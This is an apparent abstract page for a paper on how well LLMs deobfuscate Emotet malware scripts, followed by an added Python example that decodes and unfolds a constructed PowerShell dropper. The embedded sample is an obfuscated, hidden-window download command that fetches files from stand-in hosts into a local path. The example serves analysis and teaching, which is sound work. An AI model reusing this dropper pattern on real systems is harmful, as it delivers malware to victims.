Assessing LLMs in Malicious Code Deobfuscation of Real-world Malware Campaigns
Constantinos Patsakis, Fran Casino, Nikolaos Lykousas

TL;DR
This paper evaluates the ability of state-of-the-art large language models to deobfuscate real-world malicious scripts from the Emotet malware campaign, highlighting their potential for enhancing AI-driven cybersecurity defenses.
Contribution
It provides an empirical assessment of LLMs' deobfuscation capabilities on real malware, demonstrating their potential and limitations for cybersecurity applications.
Findings
Some LLMs can effectively deobfuscate malicious payloads
Fine-tuning improves LLM performance in malware deobfuscation
LLMs show promise for future AI-powered threat intelligence
Abstract
The integration of large language models (LLMs) into various pipelines is increasingly widespread, effectively automating many manual tasks and often surpassing human capabilities. Cybersecurity researchers and practitioners have recognised this potential. Thus, they are actively exploring its applications, given the vast volume of heterogeneous data that requires processing to identify anomalies, potential bypasses, attacks, and fraudulent incidents. On top of this, LLMs' advanced capabilities in generating functional code, comprehending code context, and summarising its operations can also be leveraged for reverse engineering and malware deobfuscation. To this end, we delve into the deobfuscation capabilities of state-of-the-art LLMs. Beyond merely discussing a hypothetical scenario, we evaluate four LLMs with real-world malicious scripts used in the notorious Emotet malware campaign.…
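As an added illustration of what "deobfuscation" means for the kind of script the paper evaluates (example code written for this page, not the authors' code, their dataset, or an artifact from the Emotet campaign): a small Python pass over a constructed, Emotet-style PowerShell command line. Emotet maldocs launched PowerShell with a base64-encoded, UTF-16LE command whose strings were assembled from `[char]` codes and `'a'+'b'` concatenations and whose download URLs were joined with `@` and split at run time. The sample, its URLs and its file path are made up; the three folding steps are the mechanical part of the job that an analyst (or an LLM) has to get right before the intent of the script is readable.

```python
import base64
import re

# Constructed sample modelled on Emotet-style PowerShell droppers; not a real
# campaign artifact. _INNER is what the dropper runs after PowerShell decodes
# the -EncodedCommand argument. The hosts, URLs and path are invented.
_INNER = (
    "$u='http://exa'+'mple.invalid/a@http://'+'example.invalid/b';"
    "$p=[char]99+[char]58+[char]92+'t'+'mp';"
    "foreach($x in $u.Split('@')){try{(New-Object Net.WebClient).DownloadFile($x,$p)}catch{}}"
)
SAMPLE = "powershell -w hidden -e " + base64.b64encode(_INNER.encode("utf-16le")).decode()


def decode_encoded_command(cmdline):
    """Pull the -e/-ec/-enc/-EncodedCommand payload out of a command line and
    decode it. PowerShell expects base64 over UTF-16LE, not UTF-8."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16le")


def fold_char_codes(script):
    """Replace every [char]NN token with the quoted literal character."""
    return re.sub(r"\[char\](\d+)", lambda m: "'" + chr(int(m.group(1))) + "'", script)


def fold_concat(script):
    """Collapse 'a'+'b' into 'ab', repeating until nothing changes so chains of
    any length are folded. Only single-quoted literals are touched; variables
    and expressions are left alone."""
    pat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    prev = None
    while prev != script:
        prev = script
        script = pat.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
    return script


def extract_urls(script):
    """Recover URLs from the folded script. '@' is excluded from the URL
    characters because Emotet used it as the separator of its URL list."""
    return re.findall(r"https?://[^\s'\"@]+", script)


def deobfuscate(cmdline):
    """Return (readable script, list of URLs), or (None, []) if the command
    line carries no encoded payload."""
    inner = decode_encoded_command(cmdline)
    if inner is None:
        return None, []
    readable = fold_concat(fold_char_codes(inner))
    return readable, extract_urls(readable)


if __name__ == "__main__":
    script, urls = deobfuscate(SAMPLE)
    print(script)
    print(urls)
```

The passes are deliberately narrow: they only rewrite string literals, so a rewrite can never change what the script does, which is the property an analyst wants from any automated deobfuscation step before trusting its output.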
Taxonomy
Topics: Advanced Malware Detection Techniques · Network Security and Intrusion Detection · Information and Cyber Security
